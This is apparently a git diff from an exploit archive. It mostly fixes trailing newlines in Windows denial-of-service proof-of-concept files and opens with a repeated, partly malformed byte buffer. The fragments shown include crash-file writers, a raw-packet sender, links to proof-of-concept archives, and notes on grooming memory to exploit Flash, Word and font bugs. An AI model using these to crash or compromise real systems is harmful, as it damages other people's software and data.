00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f"; open ($File, ">$file"); print $File $cr; -close ($File); +close ($File); \ No newline at end of file diff --git a/platforms/windows/dos/37462.pl b/platforms/windows/dos/37462.pl index 9c00cbfd3..717e74fdf 100755 --- a/platforms/windows/dos/37462.pl +++ b/platforms/windows/dos/37462.pl @@ -13,4 +13,4 @@ my $file = "dark.avi"; open ($File, ">$file"); print $File $h,$d; -close ($File); +close ($File); \ No newline at end of file diff --git a/platforms/windows/dos/37463.pl b/platforms/windows/dos/37463.pl index e70470c5c..1146961e0 100755 --- a/platforms/windows/dos/37463.pl +++ b/platforms/windows/dos/37463.pl @@ -62,4 +62,4 @@ print "0/// avi file Created Enjoy! \n"; print "N.B : If the program says to locate the file just browse into it's directory and select it , if not , Enjoy\n"; # End Of Exploit -#-------------------- +#-------------------- \ No newline at end of file diff --git a/platforms/windows/dos/37471.pl b/platforms/windows/dos/37471.pl index 8a3c41f16..4ccc617ae 100755 --- a/platforms/windows/dos/37471.pl +++ b/platforms/windows/dos/37471.pl @@ -43,4 +43,4 @@ open ($File, ">$file"); print $File $h; close ($File); -#------------------------------------------------------------------------------- +#------------------------------------------------------------------------------- \ No newline at end of file diff --git a/platforms/windows/dos/37568.pl b/platforms/windows/dos/37568.pl index 1a8e82b04..e1b9752eb 100755 --- a/platforms/windows/dos/37568.pl +++ b/platforms/windows/dos/37568.pl @@ -17,4 +17,4 @@ my $file = "darkpuzzle.3gp"; open ($File, ">$file"); print $File $a,$b,$c,$d; -close ($File); +close ($File); \ No newline at end of file diff --git a/platforms/windows/dos/37593.py b/platforms/windows/dos/37593.py index cf90e0ecc..591c719e9 100755 --- a/platforms/windows/dos/37593.py +++ b/platforms/windows/dos/37593.py @@ -27,4 +27,4 @@ filename = "crash.ogg" file = open(filename , "w") file.write(crash) print "\n Files Created!\n" -file.close() +file.close() \ No newline at end of file diff --git a/platforms/windows/dos/376.html b/platforms/windows/dos/376.html index d766df319..8eb99731d 100755 --- a/platforms/windows/dos/376.html +++ b/platforms/windows/dos/376.html @@ -2,4 +2,4 @@ -// milw0rm.com [2004-08-04] +// milw0rm.com [2004-08-04] \ No newline at end of file diff --git a/platforms/windows/dos/37612.py b/platforms/windows/dos/37612.py index 594841a73..77252c8b7 100755 --- a/platforms/windows/dos/37612.py +++ b/platforms/windows/dos/37612.py @@ -27,7 +27,4 @@ filename = "CRASH.TXT" file = open(filename , "w") file.write(crash) print "\n Files Created!\n" -file.close() - - - +file.close() \ No newline at end of file diff --git a/platforms/windows/dos/37640.pl b/platforms/windows/dos/37640.pl index b8dae6a5a..8ee87d482 100755 --- a/platforms/windows/dos/37640.pl +++ b/platforms/windows/dos/37640.pl @@ -15,5 +15,4 @@ my $file= "dark-puzzle.mp3"; open($FILE,">$file"); print $FILE $id.$cdat; close($FILE); -print "MP3 File Created , Enjoy !!\n"; - +print "MP3 File Created , Enjoy !!\n"; \ No newline at end of file diff --git a/platforms/windows/dos/37669.pl b/platforms/windows/dos/37669.pl index efa6c11b9..bf4e6e606 100755 --- a/platforms/windows/dos/37669.pl +++ b/platforms/windows/dos/37669.pl @@ -166,6 +166,4 @@ sub send_packet { select(undef, undef, undef, 0.40); # Sleep 400 milliseconds send(RAW, $_[0], 0, pack('Sna4x8', AF_INET, 60, $css)) || die $!; } -} - - +} \ No newline at end of file diff --git a/platforms/windows/dos/3768.pl b/platforms/windows/dos/3768.pl index 3133132d1..1d1959a28 100755 --- a/platforms/windows/dos/3768.pl +++ b/platforms/windows/dos/3768.pl @@ -62,4 +62,4 @@ close(wmv); # UniquE(at)UniquE-Key.Org # http://www.UniquE-Key.Org -# milw0rm.com [2007-04-19] +# milw0rm.com [2007-04-19] \ No newline at end of file diff --git a/platforms/windows/dos/3770.pl b/platforms/windows/dos/3770.pl index d3b3b391c..2b24c7e59 100755 --- a/platforms/windows/dos/3770.pl +++ b/platforms/windows/dos/3770.pl @@ -143,4 +143,4 @@ int i = 0; return 0; } -# milw0rm.com [2007-04-20] +# milw0rm.com [2007-04-20] \ No newline at end of file diff --git a/platforms/windows/dos/3782.pl b/platforms/windows/dos/3782.pl index 2036606f8..d5524cc38 100755 --- a/platforms/windows/dos/3782.pl +++ b/platforms/windows/dos/3782.pl @@ -58,4 +58,4 @@ print avi "\x4D\x54\x68\x64"; #0nLy Iran :X #Farzad.Sharifi -# milw0rm.com [2007-04-23] +# milw0rm.com [2007-04-23] \ No newline at end of file diff --git a/platforms/windows/dos/37843.txt b/platforms/windows/dos/37843.txt index 10999b327..b7f770dfd 100755 --- a/platforms/windows/dos/37843.txt +++ b/platforms/windows/dos/37843.txt @@ -51,4 +51,4 @@ So the idea is to use the rest argument to get a working poc. For example: Compile with mxmlc -target-player 15.0 -swf-version 25 XApplyPoc.as. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37843.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37843.zip \ No newline at end of file diff --git a/platforms/windows/dos/37844.txt b/platforms/windows/dos/37844.txt index 332b2cb77..81f2c8cb4 100755 --- a/platforms/windows/dos/37844.txt +++ b/platforms/windows/dos/37844.txt @@ -109,5 +109,4 @@ My mistake, not a UAF but instead a heap overflow. We allocate first 4*0x100000 Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37844.zip - +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37844.zip \ No newline at end of file diff --git a/platforms/windows/dos/37845.txt b/platforms/windows/dos/37845.txt index 089f45784..d13e8a8f7 100755 --- a/platforms/windows/dos/37845.txt +++ b/platforms/windows/dos/37845.txt @@ -42,4 +42,4 @@ At first sight this looks to be an uninitialized stack variable but I might be w --- Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37845.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37845.zip \ No newline at end of file diff --git a/platforms/windows/dos/37846.txt b/platforms/windows/dos/37846.txt index 1ce47089a..f39460cf9 100755 --- a/platforms/windows/dos/37846.txt +++ b/platforms/windows/dos/37846.txt @@ -60,5 +60,4 @@ Reading this data back is not straightforward. For a DefineBitsLossless tag, we --- Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37846.zip - +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37846.zip \ No newline at end of file diff --git a/platforms/windows/dos/37847.txt b/platforms/windows/dos/37847.txt index 921f47ce0..4443ecff7 100755 --- a/platforms/windows/dos/37847.txt +++ b/platforms/windows/dos/37847.txt @@ -144,5 +144,4 @@ var a = tfield.filters --- Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37847.zip - +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37847.zip \ No newline at end of file diff --git a/platforms/windows/dos/37848.txt b/platforms/windows/dos/37848.txt index 0fd4071e1..deb26db57 100755 --- a/platforms/windows/dos/37848.txt +++ b/platforms/windows/dos/37848.txt @@ -139,5 +139,4 @@ tfield.filters = o --- Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37848.zip - +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37848.zip \ No newline at end of file diff --git a/platforms/windows/dos/37853.txt b/platforms/windows/dos/37853.txt index 5c1a395f0..b041a5488 100755 --- a/platforms/windows/dos/37853.txt +++ b/platforms/windows/dos/37853.txt @@ -141,5 +141,4 @@ bd.getPixel32(o,4) --- Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37853.zip - +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37853.zip \ No newline at end of file diff --git a/platforms/windows/dos/37854.txt b/platforms/windows/dos/37854.txt index 9896b1377..995a09c24 100755 --- a/platforms/windows/dos/37854.txt +++ b/platforms/windows/dos/37854.txt @@ -58,5 +58,4 @@ newmc.scrollRect = o --- Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37854.zip - +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37854.zip \ No newline at end of file diff --git a/platforms/windows/dos/37856.txt b/platforms/windows/dos/37856.txt index 74dce5eb6..43b35d17f 100755 --- a/platforms/windows/dos/37856.txt +++ b/platforms/windows/dos/37856.txt @@ -47,5 +47,4 @@ Notes: - Attached samples: signal_sigsegv_7ffff6d2184d_5692_9217909125eb9174614e1368d5f07173 (crashing file), 9217909125eb9174614e1368d5f07173 (original file). The total difference between the two files is 13 bytes. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37856.zip - +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37856.zip \ No newline at end of file diff --git a/platforms/windows/dos/37857.txt b/platforms/windows/dos/37857.txt index 5f1fcbbbc..7e262ff27 100755 --- a/platforms/windows/dos/37857.txt +++ b/platforms/windows/dos/37857.txt @@ -45,5 +45,4 @@ Notes: - Attached samples: signal_sigsegv_7ffff6d8a235_3103_51dea5ced16249520f1fa0a7a63d7b36 (crashing file), 51dea5ced16249520f1fa0a7a63d7b36 (original file). The total difference between the two files is 19 bytes. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37857.zip - +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37857.zip \ No newline at end of file diff --git a/platforms/windows/dos/37858.txt b/platforms/windows/dos/37858.txt index ab2da4e5d..06c826f37 100755 --- a/platforms/windows/dos/37858.txt +++ b/platforms/windows/dos/37858.txt @@ -58,5 +58,4 @@ Notes: - Attached samples: signal_sigsegv_7ffff710e9d3_881_11431348555663755408.ttf.swf (crashing file), 11431348555663755408.ttf.swf (original file). Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37858.zip - +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37858.zip \ No newline at end of file diff --git a/platforms/windows/dos/37860.txt b/platforms/windows/dos/37860.txt index f83746d72..889dc8eeb 100755 --- a/platforms/windows/dos/37860.txt +++ b/platforms/windows/dos/37860.txt @@ -47,5 +47,4 @@ c.setRGB(o) --- Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37860.zip - +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37860.zip \ No newline at end of file diff --git a/platforms/windows/dos/37861.txt b/platforms/windows/dos/37861.txt index f594b8ffb..93913bfc4 100755 --- a/platforms/windows/dos/37861.txt +++ b/platforms/windows/dos/37861.txt @@ -70,5 +70,4 @@ And we're done :) --- Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37861.zip - +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37861.zip \ No newline at end of file diff --git a/platforms/windows/dos/37862.txt b/platforms/windows/dos/37862.txt index 2adaca9e2..5fdcd3ce4 100755 --- a/platforms/windows/dos/37862.txt +++ b/platforms/windows/dos/37862.txt @@ -59,5 +59,4 @@ WARNING: Stack unwind information not available. Following frames may be wrong. For 2), there's a .tar file with a repro SWF in it (may not reproduce outside of analysis tools because it is an OOB read). Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37862.zip - +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37862.zip \ No newline at end of file diff --git a/platforms/windows/dos/37875.txt b/platforms/windows/dos/37875.txt index fb1908dce..155d00f58 100755 --- a/platforms/windows/dos/37875.txt +++ b/platforms/windows/dos/37875.txt @@ -22,6 +22,4 @@ Flash32_17_0_0_188+0x18cb: - The following test cases are attached: 2038518113_crash.swf (crashing file), 2038518113_min.swf (minimized file), 2038518113_orig.swf (original non-crashing file). Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37875.zip - - +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37875.zip \ No newline at end of file diff --git a/platforms/windows/dos/3788.html b/platforms/windows/dos/3788.html index 8fd0bb5ae..9f56339e4 100755 --- a/platforms/windows/dos/3788.html +++ b/platforms/windows/dos/3788.html @@ -55,4 +55,4 @@ target.Slot52 = arg1 </html> -# milw0rm.com [2007-04-24] +# milw0rm.com [2007-04-24] \ No newline at end of file diff --git a/platforms/windows/dos/37883.txt b/platforms/windows/dos/37883.txt index 45e5e5ca7..eb762b7f4 100755 --- a/platforms/windows/dos/37883.txt +++ b/platforms/windows/dos/37883.txt @@ -127,5 +127,4 @@ var a = tfield.filters --- Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37883.zip - +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37883.zip \ No newline at end of file diff --git a/platforms/windows/dos/37884.txt b/platforms/windows/dos/37884.txt index 12ca62e54..f775bc18c 100755 --- a/platforms/windows/dos/37884.txt +++ b/platforms/windows/dos/37884.txt @@ -111,5 +111,4 @@ tfield.filters = o; Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37884.zip - +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37884.zip \ No newline at end of file diff --git a/platforms/windows/dos/3789.html b/platforms/windows/dos/3789.html index 234c30a04..3d9e38fe4 100755 --- a/platforms/windows/dos/3789.html +++ b/platforms/windows/dos/3789.html @@ -54,4 +54,4 @@ target.Filename = arg1 </html> -# milw0rm.com [2007-04-24] +# milw0rm.com [2007-04-24] \ No newline at end of file diff --git a/platforms/windows/dos/3790.html b/platforms/windows/dos/3790.html index 368a0e347..abe9952bf 100755 --- a/platforms/windows/dos/3790.html +++ b/platforms/windows/dos/3790.html @@ -63,4 +63,4 @@ target.IsChecked arg1 </html> -# milw0rm.com [2007-04-24] +# milw0rm.com [2007-04-24] \ No newline at end of file diff --git a/platforms/windows/dos/37905.rb b/platforms/windows/dos/37905.rb index c15945f92..eea7b82ca 100755 --- a/platforms/windows/dos/37905.rb +++ b/platforms/windows/dos/37905.rb @@ -51,4 +51,4 @@ overflow exception disconnect end -end +end \ No newline at end of file diff --git a/platforms/windows/dos/37909.txt b/platforms/windows/dos/37909.txt index 135d9be2e..bc8cb376d 100755 --- a/platforms/windows/dos/37909.txt +++ b/platforms/windows/dos/37909.txt @@ -92,5 +92,4 @@ Examining memory at [ebp-8] we see: An attacker may control the uninitialized value by first allocating a heap chunk of the same size such that it will land in the same spot as the above chunk. The attacker can write data to the +4ch offset and then free the chunk back to the system. The attacker will then have control over the pointer in eax+4ch when it is used during . If this points to a valid page it will survive the dereferences in the crashing path. It did not look as though there was an immediately path to cause an out of bounds memory write. However, it is likely that this attacker controlled pointer will need to be free-ed later in execution. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37909.zip - +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37909.zip \ No newline at end of file diff --git a/platforms/windows/dos/37910.txt b/platforms/windows/dos/37910.txt index 941027261..2f1effe87 100755 --- a/platforms/windows/dos/37910.txt +++ b/platforms/windows/dos/37910.txt @@ -84,5 +84,4 @@ wwlib!FMain+0x66d93: At attacker may control these values by grooming memory so that he or she controls the memory after the a8 sized chunk. This can lead to memory corruption and arbitrary code execution. The root cause of this bug suggestive of a type confusion vulnerability earlier in the call stack but this has not been determined with certainty. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37910.zip - +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37910.zip \ No newline at end of file diff --git a/platforms/windows/dos/37911.txt b/platforms/windows/dos/37911.txt index 34e1fbc8e..266b5ab77 100755 --- a/platforms/windows/dos/37911.txt +++ b/platforms/windows/dos/37911.txt @@ -65,5 +65,4 @@ bp 3bdb946d ".if (@esi & 0x`ffffffff) = 0x`80008100 {} .else{gc}" This crash is writing to a memory address out-of-bound to the allocated buffer, therefore this is an exploitable vulnerability. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37911.zip - +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37911.zip \ No newline at end of file diff --git a/platforms/windows/dos/37912.txt b/platforms/windows/dos/37912.txt index 9d56f6b7c..da75785ec 100755 --- a/platforms/windows/dos/37912.txt +++ b/platforms/windows/dos/37912.txt @@ -67,5 +67,4 @@ WARNING: Stack unwind information not available. Following frames may be wrong. To exploit this bug an attacker must spray memory until virtual address 0x00019000 is reserved and committed into the running process. Then, at offset 0x910 in that page the attacker must place any address he or she wishes to free. This will lead to an exploitable arbitrary free vulnerability. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37912.zip - +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37912.zip \ No newline at end of file diff --git a/platforms/windows/dos/37913.txt b/platforms/windows/dos/37913.txt index cb4198494..3ae01f1fd 100755 --- a/platforms/windows/dos/37913.txt +++ b/platforms/windows/dos/37913.txt @@ -63,5 +63,4 @@ In this crash the value being dereferenced in edi is free-ed memory: There is a 1-bit clear at the location specified by edi shortly after the faulting eip location as well making this an exploitable condition. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37913.zip - +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37913.zip \ No newline at end of file diff --git a/platforms/windows/dos/37914.txt b/platforms/windows/dos/37914.txt index ed277c629..c5abb7d18 100755 --- a/platforms/windows/dos/37914.txt +++ b/platforms/windows/dos/37914.txt @@ -73,5 +73,4 @@ In order to reproduce the problem with the provided sample, it might be necessar Attached is a proof of concept font file together with the corresponding kernel crash log. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37914.zip - +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37914.zip \ No newline at end of file diff --git a/platforms/windows/dos/37915.txt b/platforms/windows/dos/37915.txt index 0b8d35044..1e292110e 100755 --- a/platforms/windows/dos/37915.txt +++ b/platforms/windows/dos/37915.txt @@ -66,5 +66,4 @@ The issue reproduces on Windows 7 and 8.1. It is easiest to reproduce with Speci Attached is a proof of concept font file together with the corresponding kernel crash log. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37915.zip - +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37915.zip \ No newline at end of file diff --git a/platforms/windows/dos/37916.txt b/platforms/windows/dos/37916.txt index 17a81e95e..fbd9cfc8d 100755 --- a/platforms/windows/dos/37916.txt +++ b/platforms/windows/dos/37916.txt @@ -65,5 +65,4 @@ The issue reproduces on reliably Windows 7 and 8.1. It is easiest to reproduce a Attached is an archive with two proof of concept font files together with corresponding kernel crash logs. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37916.zip - +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37916.zip \ No newline at end of file diff --git a/platforms/windows/dos/37917.txt b/platforms/windows/dos/37917.txt index d95f5a657..6d844501e 100755 --- a/platforms/windows/dos/37917.txt +++ b/platforms/windows/dos/37917.txt @@ -65,5 +65,4 @@ The issue reproduces on Windows 7 and 8.1. It is easiest to reproduce with Speci Attached is an archive with three proof of concept font files together with corresponding kernel crash logs. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37917.zip - +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37917.zip \ No newline at end of file diff --git a/platforms/windows/dos/37918.txt b/platforms/windows/dos/37918.txt index 3d6efd805..e087fa736 100755 --- a/platforms/windows/dos/37918.txt +++ b/platforms/windows/dos/37918.txt @@ -130,5 +130,4 @@ I am attaching another archive with further 3 samples triggering crashes at inva Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37918.zip - +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37918.zip \ No newline at end of file diff --git a/platforms/windows/dos/37919.txt b/platforms/windows/dos/37919.txt index 05ee17816..67cf54110 100755 --- a/platforms/windows/dos/37919.txt +++ b/platforms/windows/dos/37919.txt @@ -87,5 +87,4 @@ The issue reproduces on Windows 7 and 8.1. It is easiest to reproduce with Speci Attached is an archive with eight sample files, each crashing at a different location in the win32k!itrp_IUP function on Windows 7 32-bit, together with corresponding kernel crash logs. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37919.zip - +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37919.zip \ No newline at end of file diff --git a/platforms/windows/dos/37920.txt b/platforms/windows/dos/37920.txt index 7a122333c..7bd91a2f4 100755 --- a/platforms/windows/dos/37920.txt +++ b/platforms/windows/dos/37920.txt @@ -108,5 +108,4 @@ The issue reproduces on Windows 7. It is easiest to reproduce with Special Pools Attached is an archive with two proof of concept font files together with corresponding kernel crash logs. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37920.zip - +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37920.zip \ No newline at end of file diff --git a/platforms/windows/dos/37921.txt b/platforms/windows/dos/37921.txt index 95ad3f5d5..3981ba967 100755 --- a/platforms/windows/dos/37921.txt +++ b/platforms/windows/dos/37921.txt @@ -116,5 +116,4 @@ Note that this crash is very similar in its nature to Issue 383 (invalid memor Attached is an archive with six proof of concept font files (three for each crash location) together with corresponding kernel crash logs. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37921.zip - +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37921.zip \ No newline at end of file diff --git a/platforms/windows/dos/37922.txt b/platforms/windows/dos/37922.txt index 17e4b5d32..8ec5cda24 100755 --- a/platforms/windows/dos/37922.txt +++ b/platforms/windows/dos/37922.txt @@ -160,5 +160,4 @@ WARNING: Stack unwind information not available. Following frames may be wrong. Attached are further three samples together with corresponding crash log files, which reproduce the issue at the ATMFD+0x3407b location. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37922.zip - +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37922.zip \ No newline at end of file diff --git a/platforms/windows/dos/37923.txt b/platforms/windows/dos/37923.txt index d4a227fe3..8d9557122 100755 --- a/platforms/windows/dos/37923.txt +++ b/platforms/windows/dos/37923.txt @@ -87,5 +87,4 @@ The issue reproduces on Windows 7. It is easiest to reproduce with Special Pools Attached is an archive with two proof of concept font files together with corresponding kernel crash logs. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37923.zip - +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37923.zip \ No newline at end of file diff --git a/platforms/windows/dos/37924.txt b/platforms/windows/dos/37924.txt index 7696e7275..57978bb49 100755 --- a/platforms/windows/dos/37924.txt +++ b/platforms/windows/dos/37924.txt @@ -54,5 +54,4 @@ WARNING: Stack unwind information not available. Following frames may be wrong. 